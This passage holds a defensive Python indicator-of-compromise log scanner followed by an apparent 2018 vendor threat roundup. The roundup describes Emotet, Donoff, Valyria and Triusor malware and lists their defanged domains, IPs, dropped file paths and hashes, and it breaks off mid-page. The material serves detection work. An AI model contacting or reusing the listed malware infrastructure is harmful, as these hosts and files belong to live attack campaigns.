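# Host-like tokens: dotted IPv4 or a dotted name, not glued to other word characters.
_HOST_RE = re.compile(
    r"(?<![\w.-])((?:\d{1,3}\.){3}\d{1,3}|[a-z0-9-]+(?:\.[a-z0-9-]+)+)(?![\w-])", re.I)


def scan_line(line, ips, domains):
    """Return the set of indicators present in one log line.
    A domain indicator also matches any of its subdomains."""
    hits = set()
    for token in _HOST_RE.findall(line):
        token = token.lower()
        if token in ips:
            hits.add(token)
            continue
        for domain in domains:
            if token == domain or token.endswith("." + domain):
                hits.add(domain)
    return hits


def scan(lines, defanged):
    """Return [(line_number, sorted hits)] for the lines that contain an indicator."""
    ips, domains = load_iocs(defanged)
    results = []
    for number, line in enumerate(lines, 1):
        hits = scan_line(line, ips, domains)
        if hits:
            results.append((number, sorted(hits)))
    return results


# Constructed log lines (not from a real environment).
LOGS = [
    "2018-11-28T10:02:11Z dns host=ws-114 qname=3ek6.top qtype=A",
    "2018-11-28T10:02:12Z proxy host=ws-114 GET http://3ek6.top/office/ 200",
    "2018-11-28T10:15:40Z proxy host=ws-201 GET https://www.example.com/ 200",
    "2018-11-29T08:41:03Z dns host=ws-077 qname=mail.cysioniven.com qtype=A",
    "2018-11-29T08:41:05Z fw host=ws-077 dst=144.217.96.196:80 action=allow",
]

if __name__ == "__main__":
    for number, hits in scan(LOGS, IOCS):
        print("line %d: %s" % (number, ", ".join(hits)))
```

<br /><br />A domain indicator matches its subdomains as well (mail.cysioniven.com counts as cysioniven.com), and hits are reported per line so they can be joined back to the host and time. Feed real logs through scan() one file at a time; the token regex is deliberately narrow so that timestamps and host names such as ws-114 are never treated as candidates.<br /><br />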
Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.<br /><a name='more'></a><br />The most prevalent threats highlighted in this roundup are:<br /><br /><ul><li><b>Doc.Malware.Donoff-6759556-0</b><br /> Malware<br /> Donoff is a malicious Microsoft Office document that leverages the Windows Command shell to launch PowerShell and download and execute an executable. <br />&nbsp;</li><li><b>Doc.Malware.00536d-6758981-0</b><br /> Malware<br /> Doc.Malware.00536d is the name given to a set of malicious documents that leverage VBA and PowerShell to install malware on the system. These documents usually convince the user to enable macros that, if executed, will download and install additional malware on the system.<br />&nbsp;</li><li><b>Xls.Dropper.Donoff-6758223-0</b><br /> Dropper<br /> Donoff is a payload delivery Office document that leverages the Windows Command shell to launch PowerShell to download and execute an executable. <br />&nbsp;</li><li><b>Win.Trojan.Emotet-6758832-0</b><br /> Trojan<br /> Emotet is a banking trojan that has remained relevant due to its continual evolution to better avoid detection. It is commonly spread via malicious emails, and saw a resurgence recently during Black Friday.<br />&nbsp;</li><li><b>Doc.Malware.Valyria-6757519-0</b><br /> Malware<br /> Valyria is a malicious Microsoft Word document family that is used to distribute other malware. This campaign is currently spreading Emotet.<br />&nbsp;</li><li><b>Win.Virus.Triusor-6757540-0</b><br /> Virus<br /> Triusor is a highly polymorphic malware family. All the binaries are packed and obfuscated to hinder static analysis, and the malware contains code that complicates dynamic analysis. 
Once it is executed, the samples perform code injection.<br />&nbsp;</li></ul><hr /><h2>Threats</h2><h3>Doc.Malware.Donoff-6759556-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>3ek6[.]top</li><li>pvy1[.]top</li><li>di29[.]top</li><li>68d4[.]top</li></ul><b>Files and or directories created</b><br /><ul><li>%LocalAppData%\Temp\sDweD.exe</li><li>%LocalAppData%\Temp\22dughsl.5qd.ps1</li><li>%LocalAppData%\Temp\4s5lt2th.dfc.psm1</li><li>%LocalAppData%\Temp\4e5cllpa.loj.psm1</li><li>%LocalAppData%\Temp\zbaj2qbd.fvr.ps1</li></ul><b>File Hashes</b><br /><ul><li>043a80eab9723a815096c7338c14105011f90c8fe1fe86a02c7c763726cfaa2a</li><li>06aa7214d492067f4f6a8aa0a910b5b32aee7734e0525a471bb2ca111ee6f3d0</li><li>09d47ec5acae65e60e8316435d57e75b8a0153458f4471c8ff3510ee2a809558</li><li>0a12a0000a78dfa623f71b0274df5b54f14dea7ddfe0799ad09cd76db2340441</li><li>0a137fefbe8edc0652e9eb4c6a9694a199d758241c5d2e5da98351771372d8f0</li><li>0b2a44c3b90bfc7c26605321c75fdc9703d67f71849cf106ef1e9fbd3160c533</li><li>0bdaed255c30cbce8a62153de694ffb80ede08f38ffd48706e415d457a21cbc1</li><li>0e12bab4d0a4c65141c6d16cc8401efda84373a667dfdca21f56b61466ef9e7d</li><li>0fe0f094572df903940dd8394c4c5c307705bb4146c794e77793f74a1e873327</li><li>121c49ab3eccc4472a13766f874b489b025ef1d5d9e1f8243085cb07290177c6</li><li>1459d9df5d2117263b051339baa35d5c28f54f5db6261135ea3d55c90e0985f7</li><li>16fa280526ab5a33bf77f4f86ffcf2a0b54c0733e26a2e070e724981927d1ad8</li><li>1792e52f31de940e6d233967b62bd6712deae048fc110ba38cea000314781c16</li><li>19badf1bbaa2ba68db14bf76e88b11a29492fb8d0cf180b83736a55d23a402be</li><li>1b409f2f2146c2318580c73d5eaeafbdd79e39d4d4f3e5862323b3b6f4a6c916</li><li>1cb58e56ae9f1a563e4789ee947f3941b90c5221f68ea0506da345fb63805826<
/li><li>1f312a61244c970d254c24055b714138835b839f1da36b9ee1cfc1acf636fbf1</li><li>24d62b3de48bf8b55b79fafcd17bf4a2cb8489a86358b26aa361193ad355dee4</li><li>25fbacf14f3ea9918aa054f040c6cc73edb9450a34e2fe739b131d9c155e3e3d</li><li>2696e57e2daac38a37ca382f979f1e4c61b20f516dd18ba33290fd00ef3eec7e</li><li>29de1616d80266c566605928b266a43dc9e1cb7c1a1ed9c95e32d54efd4f6696</li><li>2af5928b3dfeaeff2556b7fbf27ef564c0a67457ef2ec6ac41dcfdb214b84856</li><li>2caaf8bad60e3e663993727b5ff26d685fb511892f90939d04e5f92765154687</li><li>2eab620737103e94f0dcd33163071e8c0bd1cdaaf42c1d2e254d3e5e71851b24</li><li>33d98771535a91ad332f2e59969b9f51a2bf811dbe886208e139e456cd124631</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-dyXCKeeEQQM/XAGOLN3taZI/AAAAAAAABMI/wbVShm0jyYEuA2ltRgojwzB2ca7AYbbDACLcBGAs/s1600/16fa280526ab5a33bf77f4f86ffcf2a0b54c0733e26a2e070e724981927d1ad8_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://4.bp.blogspot.com/-dyXCKeeEQQM/XAGOLN3taZI/AAAAAAAABMI/wbVShm0jyYEuA2ltRgojwzB2ca7AYbbDACLcBGAs/s400/16fa280526ab5a33bf77f4f86ffcf2a0b54c0733e26a2e070e724981927d1ad8_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a 
href="https://4.bp.blogspot.com/-GRTO9qlJoq8/XAGOXwoYMQI/AAAAAAAABMM/Btxl0cohWREBHbXcd9dMAq2Ur0Jw6Z4XwCLcBGAs/s1600/0b2a44c3b90bfc7c26605321c75fdc9703d67f71849cf106ef1e9fbd3160c533_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://4.bp.blogspot.com/-GRTO9qlJoq8/XAGOXwoYMQI/AAAAAAAABMM/Btxl0cohWREBHbXcd9dMAq2Ur0Jw6Z4XwCLcBGAs/s640/0b2a44c3b90bfc7c26605321c75fdc9703d67f71849cf106ef1e9fbd3160c533_tg.png" width="640" /></a></div><br /><br /><b>Umbrella</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-RZMjwmi3JSo/XAGOiH9A6UI/AAAAAAAABMU/r_D-DFbg1pEYkjJGbI6s-s-OjD_81u2BQCLcBGAs/s1600/09d47ec5acae65e60e8316435d57e75b8a0153458f4471c8ff3510ee2a809558_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://4.bp.blogspot.com/-RZMjwmi3JSo/XAGOiH9A6UI/AAAAAAAABMU/r_D-DFbg1pEYkjJGbI6s-s-OjD_81u2BQCLcBGAs/s640/09d47ec5acae65e60e8316435d57e75b8a0153458f4471c8ff3510ee2a809558_umbrella.png" width="640" /></a></div><br /><br /><b>Malware</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-BqUGuNlUAGQ/XAGOskh8avI/AAAAAAAABMc/E124oau0rScdjMqyd0bN1hgPsKf6Wiw1ACLcBGAs/s1600/0b2a44c3b90bfc7c26605321c75fdc9703d67f71849cf106ef1e9fbd3160c533_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://1.bp.blogspot.com/-BqUGuNlUAGQ/XAGOskh8avI/AAAAAAAABMc/E124oau0rScdjMqyd0bN1hgPsKf6Wiw1ACLcBGAs/s640/0b2a44c3b90bfc7c26605321c75fdc9703d67f71849cf106ef1e9fbd3160c533_malware.png" width="640" /></a></div><br /><h3>Doc.Malware.00536d-6758981-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br 
/><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>_!SHMSFTHISTORY!_</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>cysioniven[.]com</li></ul><b>Files and or directories created</b><br /><ul><li>%LocalAppData%\Temp\ebeqjwi0.znf.ps1</li><li>%LocalAppData%\Temp\xnakv4n3.jj0.psm1</li><li>%LocalAppData%\Temp\glq130qw.p3e.psm1</li><li>%LocalAppData%\Temp\haoyv1sm.xuc.ps1</li><li>%AppData%\900194a4.exe</li></ul><b>File Hashes</b><br /><ul><li>0ef9bfca2a912149f417a562853084d460565bdea22574d5f16d148905162d07</li><li>1de14e103775d466cfe9222ba3305e254dc9e8c1efb4454343ab7ef1368cc91a</li><li>70e0962256b2f98bf5ee698be7805dff03789cecdcac79519d3a0b0f327beef7</li><li>d53aded580b952005cec23cf6e4a79de8775f5fab4ad8d1e715556499d3bd1cf</li><li>dd2b0957848a603fde2abb678f3cd9fd6a271b427c04b16708f13f10be691ab6</li><li>e470428e5c12292e0e6723c22c9b1deefa94ec8d182179118474239db192002d</li><li>e796ca332e26230a092f392d509829b63808965679e245d5914a3a9fbaeeb04f</li><li>ecbb1cacd8390963a669b92cdd6a78f3e3dfffa93e794dde7426d4ef2780fab4</li><li>f371a9934b7e07b03d3b8982fa3573b456504bf8a9ad5fc6c86801c8f40aa7cb</li><li>fd4098a016d0a192efaf640c7376ea29272313eaed35d386305a0c87bd092a70</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-1hMhIqEn4Es/Wz-6jETR80I/AAAAAAAAAc8/E5qJe2ICdUc2dhS89EAzcTks1OiNvkVhgCLcBGAs/s320/no-umbrella-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://4.bp.blogspot.com/-1hMhIqEn4Es/Wz-6jETR80I/AAAAAAAAAc8/E5qJe2ICdUc2dhS89EAzcTks1OiNvkVhgCLcBGAs/s320/no-umbrella-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a 
href="https://1.bp.blogspot.com/-jze2pzkdLuM/XAGO-Tmb0HI/AAAAAAAABMo/48nxBof-tIIElXAO3RU8QJTcgYAMPkzHgCLcBGAs/s1600/e796ca332e26230a092f392d509829b63808965679e245d5914a3a9fbaeeb04f_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://1.bp.blogspot.com/-jze2pzkdLuM/XAGO-Tmb0HI/AAAAAAAABMo/48nxBof-tIIElXAO3RU8QJTcgYAMPkzHgCLcBGAs/s400/e796ca332e26230a092f392d509829b63808965679e245d5914a3a9fbaeeb04f_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-ZyXU4bbAdRc/XAGPC2xdm3I/AAAAAAAABMs/LYm3RH-Key0KPQag81JvOZIqnFi6JJMrwCLcBGAs/s1600/e796ca332e26230a092f392d509829b63808965679e245d5914a3a9fbaeeb04f_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://1.bp.blogspot.com/-ZyXU4bbAdRc/XAGPC2xdm3I/AAAAAAAABMs/LYm3RH-Key0KPQag81JvOZIqnFi6JJMrwCLcBGAs/s640/e796ca332e26230a092f392d509829b63808965679e245d5914a3a9fbaeeb04f_tg.png" width="640" /></a></div><br /><br /><b>Malware</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-sT4g5CnxAeI/XAGPIpbS7cI/AAAAAAAABMw/h443dCFjrhQXSa39CSbAEDd0vTeWZ-FgQCLcBGAs/s1600/dd2b0957848a603fde2abb678f3cd9fd6a271b427c04b16708f13f10be691ab6_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://3.bp.blogspot.com/-sT4g5CnxAeI/XAGPIpbS7cI/AAAAAAAABMw/h443dCFjrhQXSa39CSbAEDd0vTeWZ-FgQCLcBGAs/s640/dd2b0957848a603fde2abb678f3cd9fd6a271b427c04b16708f13f10be691ab6_malware.png" width="640" /></a></div><br /><br /><h3>Xls.Dropper.Donoff-6758223-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br 
/><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>momdopre[.]top</li><li>fileiiiililliliillitte[.]xyz</li></ul><b>Files and or directories created</b><br /><ul><li>%SystemDrive%\Documents and Settings\Administrator\My Documents\rnohht`t.exe</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\upd22ef67fa.bat</li><li>%LocalAppData%\Temp\0w4zsktj.rxt.psm1</li><li>%LocalAppData%\Temp\vnug35u0.1pd.ps1</li><li>%LocalAppData%\Temp\cmnt0etf.0lt.psm1</li><li>%LocalAppData%\Temp\l21izk2f.bel.ps1</li></ul><b>File Hashes</b><br /><ul><li>0033f2a32856a043d34d491b0b79a3b1d25fbc084447ae801b94a6f4c8c67eec</li><li>0587d2fd8a94400a1a8f87a59111b4ec53c69ab7e4a50e6a4c7dd6eb7590e0b3</li><li>21df4279e0c9f6df6fb9ac8462e89ec9d2c777a3309dc9b8cf891a5232178800</li><li>405e08a4ab0c60f3ddc24dc4f4998bb654fbfae556163c9b70a2545cb79c4414</li><li>67e1cadae72e11ddb22ce0fe36e319fde32e417acaf9fcbe9ea1b0bd1852fded</li><li>6816c39d57cf2008ddd7ff252d97b9eb372c9c70ae9ac1834aee5beb0c24208c</li><li>792436cb281c6704ea7f53f7532e7abdfa1370ecf071cb07fdf690f8f6469013</li><li>7c78d19e0f8fe4420346cf0d0033071bcb5bba18015fab8d3e40dc57a5565c7b</li><li>88ceeeed4a5d23e5c26c74300d2f1cc89376c09057ac848032b45e2777d15b3d</li><li>99b43c4080202b48a2a729ed28dac8e3b98cd837494b2e419d71e7693b0652b8</li><li>9a9d1c1b43c93982eaf304c3c7ecb361bede0ea811c23cddb8b13a39328f0c3c</li><li>9e8fb999bba4c93ae100c02ede01475ddbc2b7db624930574ed76ec5813dd451</li><li>bffbd9caa578af5caa98fcb20e0e5e4f55154e9e2ca256364c1f70538c04c5b9</li><li>d59e75ccdee3f0419fd247372697275fa45f391af8319a4cf1f56df411885805</li><li>dcbdf1859c62728c680ed7267f65b3a425aaed5c79b0f7404ef2e6541150d573</li><li>e723f535550c7c4398bbb29f16e76e7a59b8e314b0d0d602c96cda07da56cc17</li><li>ee5fb50a88b4b4a97bf82258cefc53e5de1bd416ddbdbee363dd9dc269ad867d</li><li>f60827889d806f6864b2af5e
5c08c467c1f41b176ae47b51bb3918f5cafa68a9</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-9JKIwaGUO2k/XAGPXNodtbI/AAAAAAAABM8/gxQO1YnlgeMNY3ve32n-WDd2Id0p2h_EACLcBGAs/s1600/67e1cadae72e11ddb22ce0fe36e319fde32e417acaf9fcbe9ea1b0bd1852fded_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://2.bp.blogspot.com/-9JKIwaGUO2k/XAGPXNodtbI/AAAAAAAABM8/gxQO1YnlgeMNY3ve32n-WDd2Id0p2h_EACLcBGAs/s400/67e1cadae72e11ddb22ce0fe36e319fde32e417acaf9fcbe9ea1b0bd1852fded_amp.png" width="400" /></a></div><br /><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-NJETr93wbpo/XAGPbisjB9I/AAAAAAAABNE/uREFVHqD-a4RSZCBgdp4Q28LByMvvbNnQCLcBGAs/s1600/9a9d1c1b43c93982eaf304c3c7ecb361bede0ea811c23cddb8b13a39328f0c3c_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://2.bp.blogspot.com/-NJETr93wbpo/XAGPbisjB9I/AAAAAAAABNE/uREFVHqD-a4RSZCBgdp4Q28LByMvvbNnQCLcBGAs/s640/9a9d1c1b43c93982eaf304c3c7ecb361bede0ea811c23cddb8b13a39328f0c3c_tg.png" width="640" /></a></div><br /><br /><b>Umbrella</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a 
href="https://1.bp.blogspot.com/-4B72H8S1-Ls/XAGPhVSQTGI/AAAAAAAABNI/JLKSQdM7Us4ozk-jRsD3M1vrjKlkBBoAwCLcBGAs/s1600/67e1cadae72e11ddb22ce0fe36e319fde32e417acaf9fcbe9ea1b0bd1852fded_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://1.bp.blogspot.com/-4B72H8S1-Ls/XAGPhVSQTGI/AAAAAAAABNI/JLKSQdM7Us4ozk-jRsD3M1vrjKlkBBoAwCLcBGAs/s640/67e1cadae72e11ddb22ce0fe36e319fde32e417acaf9fcbe9ea1b0bd1852fded_umbrella.png" width="640" /></a></div><b><br /></b><br /><b>Malware</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-pOyPnTVjdj0/XAGPlrlxpEI/AAAAAAAABNM/A8Twfa_nJ9A4Kyt_ZlLTY1WVu7fVsZF1gCLcBGAs/s1600/7c78d19e0f8fe4420346cf0d0033071bcb5bba18015fab8d3e40dc57a5565c7b_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="864" data-original-width="1152" height="480" src="https://1.bp.blogspot.com/-pOyPnTVjdj0/XAGPlrlxpEI/AAAAAAAABNM/A8Twfa_nJ9A4Kyt_ZlLTY1WVu7fVsZF1gCLcBGAs/s640/7c78d19e0f8fe4420346cf0d0033071bcb5bba18015fab8d3e40dc57a5565c7b_malware.png" width="640" /></a></div><br /><h3>Win.Trojan.Emotet-6758832-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>67[.]216[.]131[.]134</li><li>88[.]235[.]54[.]71</li><li>24[.]190[.]11[.]79</li><li>192[.]208[.]165[.]34</li><li>98[.]6[.]145[.]178</li><li>207[.]244[.]67[.]214</li></ul><b>Domain Names</b> contacted by malware. 
Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Files and or directories created</b><br /><ul><li>%WinDir%\SysWOW64\4WPGc4HlcDQ.exe</li></ul><b>File Hashes</b><br /><ul><li>3567201c7de66370aa8eb0bd6242b0ce6edf3d4326c2255828470407a2a124b3</li><li>3f2fa56542583680c7feeda31a5e16b85f11d74b710e6cb699ffcf15b6ca753a</li><li>40ef85a4108702a3af09f9047b66585ffa2c73458cf9177a6ca67b4d8f388050</li><li>529a8f391dd994779340aa59118b703256321bb421db138ee0b7db4265599b12</li><li>5f30eab9dbf08a80292bc5184b6ff8e0ef075806b3d1eb8f5b5c525ec3efc4e9</li><li>78ccba1d9e5d32658ce4cd4b2f8a8be65c6aa6a4f4eec2016777afb3a50ac843</li><li>7d42a037f8c824724e3525e40f09ae6b3f0eaca4278e4f0b95bb5ca50f008f7b</li><li>864b1ce8feeed53db144afae131da20601bdf2951e198827177d40a233c490bd</li><li>c1b6f751fda9de784eea8764525eda4ea0644492c1dd8f1da9fc34e5b26b95b6</li><li>c2ffeb181bc57e65011cb68ed33de62ef2ae79b12f320fa8362b096fe9f26430</li><li>d60149eb78e3df622e24afec34b06c7c4c1d26a401ec326ea5eaaa74df873e3b</li><li>e06807d11e7fba844ffe986638234633bfb93ccea283187b9019e0268b7876f4</li><li>f5e1c6d6d9bd26a6d0ae3b8657030dd40138e0371b824013821f48302e3f67f3</li><li>fe7d3a850371b6effe47525e39efbf705c4136e78b35f78228b1f986d30ceced</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a 
href="https://3.bp.blogspot.com/-1aKNrVT7WIs/XAGPznUQwsI/AAAAAAAABNc/_C_BnFH_HJMdKrgWm57WqIGLrsOWJjsJACLcBGAs/s1600/c1b6f751fda9de784eea8764525eda4ea0644492c1dd8f1da9fc34e5b26b95b6_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="218" src="https://3.bp.blogspot.com/-1aKNrVT7WIs/XAGPznUQwsI/AAAAAAAABNc/_C_BnFH_HJMdKrgWm57WqIGLrsOWJjsJACLcBGAs/s320/c1b6f751fda9de784eea8764525eda4ea0644492c1dd8f1da9fc34e5b26b95b6_amp.png" width="320" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-vdpj_i_k3oM/XAGP_LnEIXI/AAAAAAAABNk/jSks-5njJgIxZrbu_2F3GJxcdhly9QVKgCLcBGAs/s1600/5f30eab9dbf08a80292bc5184b6ff8e0ef075806b3d1eb8f5b5c525ec3efc4e9_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="505" data-original-width="962" height="334" src="https://4.bp.blogspot.com/-vdpj_i_k3oM/XAGP_LnEIXI/AAAAAAAABNk/jSks-5njJgIxZrbu_2F3GJxcdhly9QVKgCLcBGAs/s640/5f30eab9dbf08a80292bc5184b6ff8e0ef075806b3d1eb8f5b5c525ec3efc4e9_tg.png" width="640" /></a></div><br /><h3>Doc.Malware.Valyria-6757519-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Domain Names</b> contacted by malware. 
Does not indicate maliciousness<br /><ul><li>mnesenesse[.]com</li><li>ostrolista[.]com</li></ul><b>Files and or directories created</b><br /><ul><li>%LocalAppData%\Temp\qrldddmq.hyb.psm1</li><li>%LocalAppData%\Temp\swfrthjc.vr1.ps1</li></ul><b>File Hashes</b><br /><ul><li>0734985f67598ec0a0caf9ca31edd54bc93c5072ab0facc09f3d5164c8930afe</li><li>0ed8f1b95565876de24b49ab281f37d05d68130edc574ddd66300c5d5c9ad468</li><li>10aab8954d92baa70b29b5d9c13e0bc5f60d21bb34a00c45e963251516441aff</li><li>13707ac10ce41e2ec1547148c17a6186ff06009cd79789e01b879e96a5765f8a</li><li>15edcb2fc3b4d2fc1700f8e6837cd5c4759fb3791787c9cd9d0e16f129e0b234</li><li>173ee1fdd02789e581caa6858422f4afcf3cebcf4791e4e52c8ffda11ef726e4</li><li>1e1c3a6252578c94258f738d40ca36547631be604ad645e2c33a56cd26eab04b</li><li>2aa5876411a940b91e5091fffc10774063e93d9007bc5b75703747f1ff6737d9</li><li>35b3927d155688d396614850d95358c1d5b19e1d3487598788ffa1b881ecd156</li><li>4ddd6819b684653ebe12717f4c633d2aa6b249753ea2e9af9e886cd5abf599b0</li><li>500fe0e5847b6677fa8b91073d3c0fca1d80fef35cafd57b95634abab8973d42</li><li>52577b1c77ef1a8e21c3681d4610bf47fec5fbae0f751f3396dc349d23186de8</li><li>52fb2178d177421a16086155829b67154ddfc589ddc71a99b14f922741586479</li><li>54485288c4cc0956a765a7a0165b8c70066314baa98dfdfc088db0f82d611bee</li><li>5ac2183dc29d6cea617b06c5787019409662898e259f6b1c0c7465c69054bb26</li><li>608c215893b99203b2d355253d42b14fe0bae98b22a891cfa2950c79d8b4dfe1</li><li>61da1d5f5a0e508f1b79fee2a8ed00b37970f5c967cdfbf4a7933163752d777a</li><li>6b1ebcc59ca46e52be7f0b896898ef19577946da900f31145e1ae9d0451cf08f</li><li>6e005fab674754f7a84fa80b873d02d8c321cfdfa7dbb7661d9d03fbd5c943d0</li><li>6f9b7938e71ce992206f8a8c065159e36dfb26a5c146844a14c8689c68b46985</li><li>7665239ea5a4928f88cc39051fde78ad6ef2660a248bb57550fc3adb69d414bc</li><li>782071bd82d2a75149d55cf3a036add1a82349c42a77cecf17f5c74c3d535c04</li><li>8aeddfcdce551eede421e527a4f1183b6378ca7bfbea07e0f4810d8c60357cec</li><li>8eb3b092f7105734380156ddf60db8ab71d23270c55f7d9e
98499bb11399b47a</li><li>8fb33dc484fcfc5440e175cce2fe3efe3b70cfd1e61f8dbce5a846e7271a8469</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-KX19-P0orPg/XAGQNvnNGzI/AAAAAAAABNo/RxtoGJUud6wJsU31kG3zR2bgR5TGY3ocwCLcBGAs/s1600/4ddd6819b684653ebe12717f4c633d2aa6b249753ea2e9af9e886cd5abf599b0_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" 